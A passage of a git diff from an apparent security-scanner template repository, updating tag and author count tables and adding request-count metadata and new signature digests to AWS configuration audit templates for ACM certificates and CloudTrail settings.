| | | +| aj-report | 1 | | | | | | | | | +| nh | 1 | | | | | | | | | +| fortimanager | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| message-me | 1 | | | | | | | | | +| teespring | 1 | | | | | | | | | +| drum | 1 | | | | | | | | | +| mflow | 1 | | | | | | | | | +| atvise | 1 | | | | | | | | | +| openhab | 1 | | | | | | | | | +| phpbb | 1 | | | | | | | | | +| osint-image | 1 | | | | | | | | | +| phpdebug | 1 | | | | | | | | | +| basixonline | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| ds_store | 1 | | | | | | | | | +| caringbridge | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| aviary_image_editor_add-on_for_gravity_forms_project | 1 | | | | | | | | | +| querysol | 1 | | | | | | | | | +| cults3d | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| management | 1 | | | | | | | | | +| cowboy | 1 | | | | | | | | | +| packetstrom | 1 | | | | | | | | | +| infoleak | 1 | | | | | | | | | +| redgifs | 1 | | | | | | | | | +| moto-treks | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| bitcoin-forum | 1 | | | | | | | | | +| ciprianmp | 1 | | | | | | | | | +| terraboard | 1 | | | | | | | | | +| eclipsebirt | 1 | | | | | | | | | +| documentcloud | 1 | | | | | | | | | +| openbullet | 1 | | | | | | | | | +| proofpoint | 1 | | | | | | | | | +| strider | 1 | | | | | | | | | +| https | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| vgm | 1 | | | | | | | | | +| htmlcoderhelper | 1 | | | | | | | | | +| bueltge | 1 | | | | | | | | | +| labstack | 1 | | | | | | | | | +| rustici | 1 | | | | | | | | | +| manyvids | 1 | | | | | | | | | +| lighter | 1 | | | | | | | | | +| helmet_store_showroom_site_project | 1 | | | | | | | | | +| maximo | 1 | | | | | | | | | +| skyscanner | 1 | | | | | | | | | +| snapchat-stories | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | +| fotka | 1 | | | | | | | | | +| external-media-without-import | 1 | | | | | | | | | +| ifeelweb | 1 | | | | | | | | | +| apsystems | 1 | | | | | | | | | +| kasm | 1 | | | | | | | | | +| rtm-web | 1 | | | | | | | | | +| impresspages | 1 | | | | | | | | | +| pexec | 1 | | | | | | | | | +| wptrafficanalyzer | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| elmah | 1 | | | | | | | | | +| fielupload | 1 | | | | | | | | | +| age-gate | 1 | | | | | | | | | +| db2 | 1 | | | | | | | | | +| front | 1 | | | | | | | | | +| igromania | 1 | | | | | | | | | +| careerhabr | 1 | | | | | | | | | +| mnt-tech | 1 | | | | | | | | | +| disneyplus | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| netmask_project | 1 | | | | | | | | | +| ogc | 1 | | | | | | | | | +| lotus_core_cms_project | 1 | | | | | | | | | +| torchbox | 1 | | | | | | | | | +| tastyigniter | 1 | | | | | | | | | +| v2x | 1 | | | | | | | | | +| vip-blog | 1 | | | | | | | | | +| kmc_information_systems | 1 | | | | | | | | | +| wptaskforce | 1 | | | | | | | | | +| robot-cpa | 1 | | | | | | | | | +| wp-buy | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| neobox | 1 | | | | | | | | | +| voicescom | 1 | | | | | | | | | +| wikidot | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| commerce | 1 | | | | | | | | | +| gianni_tommasi | 1 | | | | | | | | | +| pivotal_software | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| rsvpmaker | 1 | | | | | | | | | +| magabook | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| frontend_uploader_project | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| mylittleadmin | 1 | | | | | | | | | +| nconf | 1 | | | | | | | | | +| mycloud | 1 | | | | | | | | | +| apex-legends | 1 | | | | | | | | | +| mailboxvalidator | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| macos-bella | 1 | | | | | | | | | +| raiden | 1 | | | | | | | | | +| ektron | 1 | | | | | | | | | +| n-media-woocommerce-checkout-fields | 1 | | | | | | | | | +| jsconfig | 1 | | | | | | | | | +| box | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| retool | 1 | | | | | | | | | +| simple_client_management_system_project | 1 | | | | | | | | | +| tmate | 1 | | | | | | | | | +| masselink | 1 | | | | | | | | | +| distcc | 1 | | | | | | | | | +| wp-shoutbox-live-chat | 1 | | | | | | | | | +| user-meta | 1 | | | | | | | | | +| satis | 1 | | | | | | | | | +| mobiproxy | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| simple-link-directory | 1 | | | | | | | | | +| quick-event-manager | 1 | | | | | | | | | +| opgg | 1 | | | | | | | | | +| mws | 1 | | | | | | | | | +| office | 1 | | | | | | | | | +| airee | 1 | | | | | | | | | +| accellion | 1 | | | | | | | | | +| ilovegrowingmarijuana | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| lgate | 1 | | | | | | | | | +| akeeba | 1 | | | | | | | | | +| cachet | 1 | | | | | | | | | +| opache | 1 | | | | | | | | | +| x-ui | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| wp-upg | 1 | | | | | | | | | +| algolplus | 1 | | | | | | | | | +| controlled-admin-access | 1 | | | | | | | | | +| g5theme | 1 | | | | | | | | | +| cybercompany | 1 | | | | | | | | | +| spnego | 1 | | | | | | | | | +| snipe-it | 1 | | | | | | | | | +| bws-promobar | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| xvideos-models | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| node-red | 1 | | | | | | | | | +| csv | 1 | | | | | | | | | +| ncast | 1 | | | | | | | | | +| symmetricom | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| ocean-extra | 1 | | | | | | | | | +| registrationmagic | 1 | | | | | | | | | +| caton | 1 | | | | | | | | | +| searchreplacedb2 | 1 | | | | | | | | | +| deezer | 1 | | | | | | | | | +| mapmytracks | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| pucit.edu | 1 | | | | | | | | | +| tracker | 1 | | | | | | | | | +| babypips | 1 | | | | | | | | | +| huiwen | 1 | | | | | | | | | +| graphpaperpress | 1 | | | | | | | | | +| secsslvpn | 1 | | | | | | | | | +| raygun | 1 | | | | | | | | | +| szmerinfo | 1 | | | | | | | | | +| setlistfm | 1 | | | | | | | | | +| properfraction | 1 | | | | | | | | | +| sentinelone | 1 | | | | | | | | | +| ultimatemember | 1 | | | | | | | | | +| searchwp | 1 | | | | | | | | | +| mura | 1 | | | | | | | | | +| kopano | 1 | | | | | | | | | +| mara_cms_project | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| conpot | 1 | | | | | | | | | +| pexip | 1 | | | | | | | | | +| questdb | 1 | | | | | | | | | +| mintme | 1 | | | | | | | | | +| softr | 1 | | | | | | | | | +| nimplant | 1 | | | | | | | | | +| oglaszamy24hpl | 1 | | | | | | | | | +| pillowfort | 1 | | | | | | | | | +| cdist | 1 | | | | | | | | | +| sourcemaps | 1 | | | | | | | | | +| phonepe | 1 | | | | | | | | | +| tutor | 1 | | | | | | | | | +| exposed | 1 | | | | | | | | | +| fiverr | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| wpaffiliatemanager | 1 | | | | | | | | | +| ansi_up_project | 1 | | | | | | | | | +| land-software | 1 | | | | | | | | | +| anaqua | 1 | | | | | | | | | +| hookbot | 1 | | | | | | | | | +| crunchrat | 1 | | | | | | | | | +| codemiq | 1 | | | | | | | | | +| hanta | 1 | | | | | | | | | +| casemanager | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| recly | 1 | | | | | | | | | +| tar | 1 | | | | | | | | | +| vironeer | 1 | | | | | | | | | +| x-ray | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| nozomi | 1 | | | | | | | | | +| jeecg_p3_biz_chat_project | 1 | | | | | | | | | +| contus-video-gallery | 1 | | | | | | | | | +| genieaccess | 1 | | | | | | | | | +| backup-guard | 1 | | | | | | | | | +| mastodon-chaossocial | 1 | | | | | | | | | +| agilecrm | 1 | | | | | | | | | +| vsftpd_project | 1 | | | | | | | | | +| la-souris-verte | 1 | | | | | | | | | +| fedoraproject | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| boostifythemes | 1 | | | | | | | | | +| bscw | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| joinmastodon | 1 | | | | | | | | | +| crypto | 1 | | | | | | | | | +| uid | 1 | | | | | | | | | +| xray | 1 | | | | | | | | | +| kaseya | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| core-dump | 1 | | | | | | | | | +| jspxcms | 1 | | | | | | | | | +| scoreme_project | 1 | | | | | | | | | +| layer5 | 1 | | | | | | | | | +| ccm | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| scratch | 1 | | | | | | | | | +| digitalspy | 1 | | | | | | | | | +| pluginops | 1 | | | | | | | | | +| photoblocks-gallery | 1 | | | | | | | | | +| beardev | 1 | | | | | | | | | +| misp | 1 | | | | | | | | | +| signet | 1 | | | | | | | | | +| advfn | 1 | | | | | | | | | +| goliath | 1 | | | | | | | | | +| khodrochi | 1 | | | | | | | | | +| personal-dictionary | 1 | | | | | | | | | +| plurk | 1 | | | | | | | | | +| workerman | 1 | | | | | | | | | +| blipfm | 1 | | | | | | | | | +| gist | 1 | | | | | | | | | +| airnotifier | 1 | | | | | | | | | +| donation-alerts | 1 | | | | | | | | | +| spirit | 1 | | | | | | | | | +| flarum | 1 | | | | | | | | | +| syncthing | 1 | | | | | | | | | +| nzbget | 1 | | | | | | | | | +| musiciansocial-mastodon-instance | 1 | | | | | | | | | +| roundupwp | 1 | | | | | | | | | +| chimpgroup | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| anobii | 1 | | | | | | | | | +| secnet-ac | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| evilginx | 1 | | | | | | | | | +| cutesoft | 1 | | | | | | | | | +| icearp | 1 | | | | | | | | | +| c4 | 1 | | | | | | | | | +| zblog | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| silenttrinity | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| urbackup | 1 | | | | | | | | | +| ifttt | 1 | | | | | | | | | +| customize-login-image | 1 | | | | | | | | | +| time | 1 | | | | | | | | | +| opms | 1 | | | | | | | | | +| wpcoursesplugin | 1 | | | | | | | | | +| wannacry | 1 | | | | | | | | | +| google_adsense_project | 1 | | | | | | | | | +| davantis | 1 | | | | | | | | | +| pokemonshowdown | 1 | | | | | | | | | +| secure-donation | 1 | | | | | | | | | +| signal | 1 | | | | | | | | | +| hec | 1 | | | | | | | | | +| media-server | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| trassir | 1 | | | | | | | | | +| colourlovers | 1 | | | | | | | | | +| microsoft | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 07d5a58d8b..223d83e311 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | -| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | -| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | -| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | -| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | -| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 57 | | | | | -| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | +| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | +| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | +| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | +| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 60 | | | | | +| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | diff --git a/cloud/aws/acm/acm-cert-renewal-30days.yaml b/cloud/aws/acm/acm-cert-renewal-30days.yaml index 3cae97828a..8db8004e41 100644 --- a/cloud/aws/acm/acm-cert-renewal-30days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-30days.yaml @@ -11,8 +11,9 @@ info: Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" @@ -54,4 +55,4 @@ code: - type: dsl dsl: - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' -# digest: 4a0a004730450220756b5be6dcc7136b4b633c69403bc8a7d096c35c2a8275b99855b974e5c6ddd102210097de27a237f011112a45966e4320e15b0b9ee2af6762bd66817106963c31b0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc7d6e62968fc709c8201354d29b61784664ef5c5ebed70a6a8b305447b93725022100bad54d48aab6fdd1356608d1940730ea10536641398de6172861695612abd412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-cert-renewal-45days.yaml b/cloud/aws/acm/acm-cert-renewal-45days.yaml index ea8a5647a5..08339d9656 100644 --- a/cloud/aws/acm/acm-cert-renewal-45days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-45days.yaml @@ -11,8 +11,9 @@ info: Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" @@ -54,4 +55,4 @@ code: - type: dsl dsl: - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' -# digest: 490a00463044022030b5597eb0c060a9e40e23a74f07216222b2df8f53391b091624a8fb3a5fc7b8022007201e8fa3b8699eed20222e46d207fb8b271fbc1c20092e96bb5a2d3740a5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b2fedb03a19db3f9d0f87fdc3982c926a2478e6e2903d2fbb55b63561d3a29c0220337c43e0512cc540287235d9f3489fb5af0dc783ae118c4341c27e2812a8d8c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-cert-validation.yaml b/cloud/aws/acm/acm-cert-validation.yaml index b66e346a02..5124cf0262 100644 --- a/cloud/aws/acm/acm-cert-validation.yaml +++ b/cloud/aws/acm/acm-cert-validation.yaml @@ -11,8 +11,9 @@ info: Use AWS ACM for certificate provisioning and ensure domain validation steps are correctly followed for each certificate issued or renewed. reference: - https://docs.aws.amazon.com/acm/latest/userguide/gs-acm-validate.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"The issue/renewal request for " + certificatearn + " SSL/TLS certificate was not validated"' -# digest: 4a0a0047304502210089639de3f7c36e53216707ebb4296d7ca7744e1227c45977772e3a5a2fa492e2022032c5f3a8a70224d2aad87a042558ad554bc58170e274510715cca40dc0e67ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092b18eb3a24d6dea12fc385763c84745bf8201424ef620661e9c9fbb1b3b513a02201dc10c6f007cea631d51e81c2b6c883bf6c530a4de13398dea1c605b4a925714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-wildcard-cert.yaml b/cloud/aws/acm/acm-wildcard-cert.yaml index ef6e896265..268397aea5 100644 --- a/cloud/aws/acm/acm-wildcard-cert.yaml +++ b/cloud/aws/acm/acm-wildcard-cert.yaml @@ -11,8 +11,9 @@ info: Replace wildcard ACM certificates with single domain name certificates for each domain/subdomain within your AWS account. This enhances security by ensuring each domain/subdomain has its own unique private key and certificate. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-certificate.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - 'certificatearn + " AWS ACM certificate is a wildcard certificate"' -# digest: 4a0a00473045022100f6ea9830b40920522f8151d891ae384572efefa30076cbf061bb313303abe50d022030dcf2a11227f66c51c43294228e264bf6b0eee1ae359cc2b84272c834de6351:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078c25c2aeb4e1ecb7851bfcf3e176bbd0eff547432a2a5ec04d150b1c3fbfdaf022100b3e428a513082fb7357f95e92309d0dfe47823bc6eb40cc403cc2836756ccd60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/aws-code-env.yaml b/cloud/aws/aws-code-env.yaml index a1d4fa922d..259558caac 100644 --- a/cloud/aws/aws-code-env.yaml +++ b/cloud/aws/aws-code-env.yaml @@ -7,6 +7,8 @@ info: Checks if AWS CLI is set up and all necessary tools are installed on the environment. reference: - https://aws.amazon.com/cli/ + metadata: + max-request: 2 tags: cloud,devops,aws,amazone,aws-cloud-config variables: @@ -50,4 +52,4 @@ code: - type: dsl dsl: - '"AWS CLI is properly configured for account \"" + account + "\" and all the necessary tools required are installed"' -# digest: 4b0a00483046022100a05a196d8113f7a6f2a0ad341f9cecb882fe6fb7067812b6fc3d60482a736759022100a2d1867891aecfc696770bef70553de20c1cf97b6dbb29a4158fee3a08522c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c79a6583acb05a00dfa742962972031f8c42ae9ce85aabc1c9edb1ae7ebd9368022100b98762cb406a952a4115e28bb639f0d16d02e0b737012da638e3bf3f5d73f5f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml index a66f25bb45..6ca863f403 100644 --- a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml @@ -11,8 +11,9 @@ info: Enable data event logging in CloudTrail for S3 buckets to ensure detailed activity monitoring and logging for better security and compliance. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-data-events-with-cloudtrail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to capture resource operations performed on or within an AWS cloud resource"' -# digest: 490a0046304402201faa9752ffea7342ad3012c17528ce7ac93a419f258bc0022f82daca0c116b060220047829932aa4d96d6a578faf2884e39bb46badf9ec8f4f4704a2cabdc2cc93a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da87f9b597db66bbcf87384782b53d2b838ad5c8b6c89924afc2607aa6c92bdf022100849208d4cb009645e9a5d9bf73dd7dfa351b390b23991bffa72a85d99ca0ac4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml index 2c279064b7..c13330de8e 100644 --- a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml @@ -11,8 +11,9 @@ info: Enable CloudTrail in all AWS regions through the AWS Management Console or CLI to ensure comprehensive activity logging and monitoring. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-getting-started.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to receive log files from all the AWS cloud regions"' -# digest: 490a0046304402201443ece0d6b4fbc1cddf7c13cedcdea324540e873081d0b64225178ee3dc2d1402203d677bdd02490a8f5a90d8e2abfa5499df844303bd18b1c2250ee3737a6ce1c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7330af1aa9ad989dc95304b0e71f8479849de9782179443c3b7caf9d9373add022034c783da46b9b3b530bbb04d08b70e1803c5d298104e3d65659addd1a8c839d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml index f33fbb19fd..1620c82ad8 100644 --- a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml @@ -11,8 +11,9 @@ info: Configure only one multi-region trail to log global service events and disable global service logging for all other trails. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"Ensure only one trail in Amazon CloudTrail is configured for global service events to avoid duplicates: " + trail' -# digest: 4a0a00473045022100863a23e0d723ae8fd1912b96f52fdd5a22168d4fedd110138ac6b8e75434ef83022040c6c4f2d88276a08fc5faa9c4601c70615bcf8d0969cbe2dbf642c7f8186b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c35edad75ea1ac20bfb4e2cbe8b2b4e8fc3b29c40e7ff611808957ab6d83f303022100a77f7c148769b6ca2d6277298d4a5269e1bb2092f609f67cef8e8152a67f02eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml index 51a2568a98..4f75b39816 100644 --- a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml @@ -11,8 +11,9 @@ info: Enable global service logging in CloudTrail by creating or updating a trail to include global services. This ensures comprehensive activity monitoring. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-create-and-update-a-trail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' -# digest: 4a0a004730450221009edff671d27bdeaf0556428297d56afb1404ff3032d9ae4b61578c2b239ec4c502202ea0baf81ef1917992591736e8dfd44578f85f84bbb8c869fca718fecefac3c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f10c2c9b4cb87ac0e4d1bdcdbf1f22db6d84b775136499410fe1fd92ba1ad9c5022100eecaa6515470a95ff633ad2df025ded9d8c20f051189a648b1f862861ceb3599:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml index cdb9e2d23c..4c31153a22 100644 --- a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml @@ -11,8 +11,9 @@ info: Enable CloudTrail log file validation and configure CloudWatch Logs to monitor CloudTrail log files. Create CloudWatch Alarms for specific events of interest. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/send-cloudtrail-events-to-cloudwatch-logs.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,cloudwatch,aws-cloud-config - variables: region: "ap-south-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to send events to CloudWatch Logs for monitoring purposes"' -# digest: 4a0a00473045022003841e6c5e526ca9c51573554cb8b79f921518607b91025823f13325bc700fd7022100c936d849e5d2106d6079dc7524894c444881996c94755ba76bff9a313b01b47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bdf150f8abb8be1e258c067aae73857443f219a130cf41d0cc3d9c0c6d45ab302205479a358041954f9d0aa04b2145860008c3732d303a381268f0c31a0148495dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml index 7feef84f70..9511e9b965 100644 --- a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml @@ -11,8 +11,9 @@ info: Enable log file integrity validation on all CloudTrail trails to ensure the integrity and authenticity of your logs. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"The log file integrity validation is not enabled for CloudTrail trail" + trail' -# digest: 4a0a00473045022100facdee59eb1d2eca53313cf4f8de941c2f7a0857645f153ad2a64c81b51d9a67022059981aa1842b49de13fc78b6673e74c755632f673f08c402ad66f59074cc2e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e301d2ce8df52b0170dbbbee6ca44cc69ea46fd81c0ff3dd3264dc81a8548c2402206321af47afdb4655e6ed862dbdc015d73cf98840e24c43636f0a2a28e2feb81c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 84ca11eca2..26b5c84fb8 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -11,8 +11,9 @@ info: Enable Server-Side Encryption (SSE) for CloudTrail logs using an AWS KMS key through the CloudTrail console or AWS CLI. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "us-east-1" @@ -60,4 +61,4 @@ code: - type: dsl dsl: - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' -# digest: 4b0a00483046022100b39586900f3cb7a7ce2582be709c7b3d1b25bceaf0f6d35887c3a3d62bfff8d80221009aa3a72ddade09b522655349a54b6cb7e6e0ebd3b36d85b30899b283e77dc90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb8aa2e414f88294926325f90076733d4a7d4af4ac18c47b9b82564412f5a2250220104bc5c6dcda1248db44229720dda05561319e3549bb6437ea1c97c6c099421c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml index 4cae24dead..ff60b9dc2b 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml @@ -11,8 +11,9 @@ info: Enable MFA Delete on CloudTrail buckets via the S3 console or AWS CLI. reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/MultiFactorAuthenticationDelete.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" @@ -70,4 +71,4 @@ code: - type: dsl dsl: - '"The MFA Delete feature is not enabled for the S3 bucket " + bucket + " associated with the CloudTrail " + trail' -# digest: 490a00463044022042298637fc3947aaaab32dc59fb448c2c08e310bc0ca8a81f04d219b3e3643e4022029d99b37008c16622b5f08d7c27548c42cbfa80b8face6e766a180fe14abb003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003bb18e55eae6aa19233a988216a85ab85d1321a68dee66dc295ce19735d9900022100bbfbf82a13f2a4e5693299287c29e50507941e1576d01425abdb7a5b0e68f775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml index d206f2aed3..6ee0dccdf4 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml @@ -11,9 +11,9 @@ info: Enable management event logging in CloudTrail by creating a new trail or updating existing trails to include management events. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-and-data-events-with-cloudtrail.html + metadata: + max-request: 2 tags: 